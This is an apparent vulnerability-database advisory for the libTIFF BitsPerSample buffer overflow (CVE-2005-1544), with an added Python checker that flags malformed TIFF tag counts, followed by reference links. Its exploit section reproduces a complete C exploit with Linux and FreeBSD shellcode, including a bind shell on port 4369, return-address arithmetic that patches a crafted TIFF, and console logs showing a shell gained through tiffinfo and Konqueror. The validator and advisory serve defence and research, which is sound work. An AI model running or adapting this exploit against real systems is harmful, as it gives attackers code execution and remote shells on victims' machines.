LibTIFF TIFFOpen Buffer Overflow Vulnerability

Vulnerability ID: 1109873    Type: Buffer overflow
Published: 2006-03-05    Updated: 2007-03-07
CVE: CVE-2005-1544    CNNVD-ID: CNNVD-200505-1027
Platform: Multiple    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/1554
https://www.securityfocus.com/bid/13585
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1027
|Vulnerability Details
libTIFF before version 3.7.2 contains a stack-based buffer overflow; a remote attacker can execute arbitrary code by supplying a TIFF file with a malformed BitsPerSample tag.
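The defect is triggered by a directory entry whose declared value count disagrees with what the file and the other tags actually support; the tiffinfo warnings quoted in the exploit below ("incorrect count for field ... tag trimmed") are the library noticing exactly that. The following Python script is an added example, not part of this advisory or of libtiff itself: it parses the first IFD of a TIFF and reports entries whose declared count violates the baseline rules (single-valued tags must have count 1, BitsPerSample must match SamplesPerPixel) or whose value data would run past the end of the file, so that such files can be rejected or quarantined before a decoder touches them. The build_tiff helper and both sample images are constructed here; the counts 257 and 150341633 in the malformed sample are the ones reported in the quoted output, not taken from a real file.

```python
import struct

# Sizes in bytes of the TIFF 6.0 field types (type codes 1..12).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
SHORT, LONG = 3, 4
TAG_NAMES = {256: "ImageWidth", 257: "ImageLength", 258: "BitsPerSample",
             259: "Compression", 262: "PhotometricInterpretation",
             273: "StripOffsets", 277: "SamplesPerPixel", 278: "RowsPerStrip",
             279: "StripByteCounts"}
# Baseline tags that always carry exactly one value.
SINGLE_VALUE_TAGS = {256, 257, 259, 262, 277, 278}


def parse_first_ifd(data):
    """Return (struct byte-order prefix, [(tag, type, count, raw 4-byte field), ...])."""
    if len(data) < 8:
        raise ValueError("shorter than a TIFF header")
    order = {b"II": "<", b"MM": ">"}.get(data[:2])
    if order is None:
        raise ValueError("bad byte-order mark")
    magic, ifd_off = struct.unpack(order + "HI", data[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    if ifd_off + 2 > len(data):
        raise ValueError("first IFD offset lies outside the file")
    (n_entries,) = struct.unpack(order + "H", data[ifd_off:ifd_off + 2])
    entries, pos = [], ifd_off + 2
    for _ in range(n_entries):
        if pos + 12 > len(data):
            raise ValueError("IFD truncated")
        entries.append(struct.unpack(order + "HHI4s", data[pos:pos + 12]))
        pos += 12
    return order, entries


def check_tiff(data):
    """Return human-readable findings for the first IFD; an empty list means no anomaly."""
    findings = []
    order, entries = parse_first_ifd(data)
    samples_per_pixel = 1  # TIFF default when tag 277 is absent
    for tag, typ, count, raw in entries:
        if tag == 277 and typ == SHORT and count == 1:
            samples_per_pixel = struct.unpack(order + "H", raw[:2])[0]
    for tag, typ, count, raw in entries:
        name = TAG_NAMES.get(tag, "unknown tag %d (0x%x)" % (tag, tag))
        if typ not in TYPE_SIZES:
            findings.append("%s: unknown field type %d" % (name, typ))
            continue
        size = TYPE_SIZES[typ] * count
        if size > 4:  # value does not fit inline, so the field holds a file offset
            (offset,) = struct.unpack(order + "I", raw)
            if offset + size > len(data):
                findings.append("%s: %d values (%d bytes) at offset %d run past end of "
                                "file (%d bytes)" % (name, count, size, offset, len(data)))
        if tag in SINGLE_VALUE_TAGS and count != 1:
            findings.append("%s: count %d, expected 1" % (name, count))
        if tag == 258 and count not in (1, samples_per_pixel):
            findings.append("BitsPerSample: count %d does not match SamplesPerPixel %d"
                            % (count, samples_per_pixel))
    return findings


def build_tiff(entries, pixels):
    """Constructed little-endian TIFF: header, strip data, one IFD, out-of-line values.

    entries are (tag, type, values[, claimed_count]); claimed_count lets a sample
    declare more values than it carries, as the malformed file in the advisory does.
    """
    fmt = {SHORT: "H", LONG: "I"}
    ifd_off = 8 + len(pixels)
    data_off = ifd_off + 2 + 12 * len(entries) + 4
    ifd, extra = struct.pack("<H", len(entries)), b""
    for entry in sorted(entries, key=lambda e: e[0]):
        tag, typ, values = entry[:3]
        count = entry[3] if len(entry) > 3 else len(values)
        packed = b"".join(struct.pack("<" + fmt[typ], v) for v in values)
        if len(packed) <= 4:
            raw = packed.ljust(4, b"\0")  # inline value, left-justified
        else:
            raw = struct.pack("<I", data_off + len(extra))
            extra += packed
        ifd += struct.pack("<HHI", tag, typ, count) + raw
    return b"II" + struct.pack("<HI", 42, ifd_off) + pixels + ifd + struct.pack("<I", 0) + extra


# Constructed samples: a 4x4 8-bit greyscale image, uncompressed, one strip at offset 8.
PIXELS = bytes(16)
BASE = [(256, LONG, [4]), (257, LONG, [4]), (259, SHORT, [1]), (262, SHORT, [1]),
        (273, LONG, [8]), (277, SHORT, [1]), (278, LONG, [4]), (279, LONG, [16])]
BENIGN_TIFF = build_tiff(BASE + [(258, SHORT, [8])], PIXELS)
# Same image, but BitsPerSample claims 257 values and PhotometricInterpretation claims
# 150341633 (the counts in the advisory's quoted tiffinfo warnings) with no data behind them.
MALFORMED_TIFF = build_tiff([e for e in BASE if e[0] != 262]
                            + [(258, SHORT, [8], 257), (262, SHORT, [1], 150341633)], PIXELS)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_TIFF), ("malformed", MALFORMED_TIFF)):
        print(label, check_tiff(blob) or "no anomalies")
```

Run as a script it prints no anomalies for the benign sample and four findings for the malformed one (two per bad tag: the data would run past end of file, and the count is inconsistent). The offset check catches the case the vulnerable versions mishandled even when a private or unknown tag is involved, since it depends only on type size, count and file length; treat a non-empty result as grounds to refuse the file rather than to "trim" the tag and continue.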
|Exploit (EXP)
/*
 LibTIFF exploit
 Tested on LibTIFF 3.7.1
 Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat

 Blog: http://gruba.blogspot.com
  
 In other versions and/or Linux distributions you might need to
 adjust some offsets.

 gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit
 cc libtiff_exploit.c -o libtiff_exploit
 gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff
 Using RET: 0xbfffffb4
 TIFFReadDirectory:
 Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.
 evil.tiff:
 Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed.
 evil.tiff:
 Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
 sh-3.00$

 gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit
 /usr/kde/3.3/bin/konqueror evil.tiff
 Linux Enabled
 Using RET: 0xbfffffb1
 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
 TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.
 : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1);
 tag
 trimmed.
 : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
 sh-3.00$ exit
 exit

 Heheh it also works like a remote exploit i would leave that work (easy work) for the
 "interested" people.

*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define OFFSET 0x3F /* return address offset */
#define SHELL_OFFSET 0x0102 /* shellcode address offset */
#define DISPLAY "DISPLAY=:0.0" /* no comments ... */
#define HOMEDIR "HOME=/tmp/"

int
main(int argc, char **argv, char **env)
{
 /* Linux shellcode that binds a shell on port 4369 */
char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31"
  "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52"
  "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2"
  "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89"
  "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0"
  "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31"
  "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05"
  "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
  "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f"
  "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
  "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

 /* (?) lies lies lies lies!*/
 #ifdef FREEBSD
 printf("FreeBSD Enabled\n");
 char shellcode[]=
  "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
  "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
 
 #else
 printf("Linux Enabled\n");
 char shellcode[] =
  "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c"
  "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
  "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd"
  "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f"
  "\x73\x68\x23";
 
 #endif

 if(argc < 3)
 {
  fprintf(stderr, "Error, arguments are like these\n"
    "%s <path_to_vuln> <eviltiff.tiff>\n", argv[0]);
  return -1;
 }
 
 char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};
 
 /* argv[1] -> executable file that is linked with vuln tiff library */
 long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;
 
 int fd = open(argv[2], O_RDWR);
 if(fd == -1)
 {
  perror("open()");
  return -1;
 }
 
 if(lseek(fd, OFFSET, SEEK_SET) == -1)
 {
  perror("lseek()");
  close(fd);
  return -1;
 }
 
 if(write(fd, (void *) &ret, sizeof(long)) != (ssize_t) sizeof(long)) /* compare as ssize_t so a -1 return is caught */
 {
  perror("write()");
  close(fd);
  return -1;
 }
 
 close(fd);
 
 fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret);
 
 if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1)
 {
  perror("execle()");
  return -1;
 }
 
 return 0;
}

// milw0rm.com [2006-03-05]
|Affected Products
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
|References

Source: XF
Name: libtiff-bitspersample-bo(20533)
Link: http://xforce.iss.net/xforce/xfdb/20533
Source: MISC
Link: http://bugs.gentoo.org/show_bug.cgi?id=91584
Source: GENTOO
Name: GLSA-200505-07
Link: http://www.gentoo.org/security/en/glsa/glsa-200505-07.xml
Source: SECUNIA
Name: 15320
Link: http://secunia.com/advisories/15320
Source: MISC
Link: http://bugzilla.remotesensing.org/show_bug.cgi?id=843
Source: UBUNTU
Name: USN-130-1
Link: http://www.ubuntu.com/usn/usn-130-1
Source: BID
Name: 13585
Link: http://www.securityfocus.com/bid/13585
Source: OSVDB
Name: 16350
Link: http://www.osvdb.org/16350
Source: MANDRIVA
Name: MDKSA-2006:042
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2006:042
Source: DEBIAN
Name: DSA-755
Link: http://www.debian.org/security/2005/dsa-755
Source: SECTRACK
Name: 1013944
Link: http://securitytracker.com/id?1013944
Source: SECUNIA
Name: 18943
Link: http://secunia.com/advisories/18943
Source: SECUNIA
Name: 18289
Link: http://secunia.com/advisories/18289
Source: SECUNIA
Name: 16872
Link: http://secunia.com/advisories/16872
Source: MANDRIVA
Name: MDKSA-2006:042
Link: http://frontal2.mandriva.com/security/a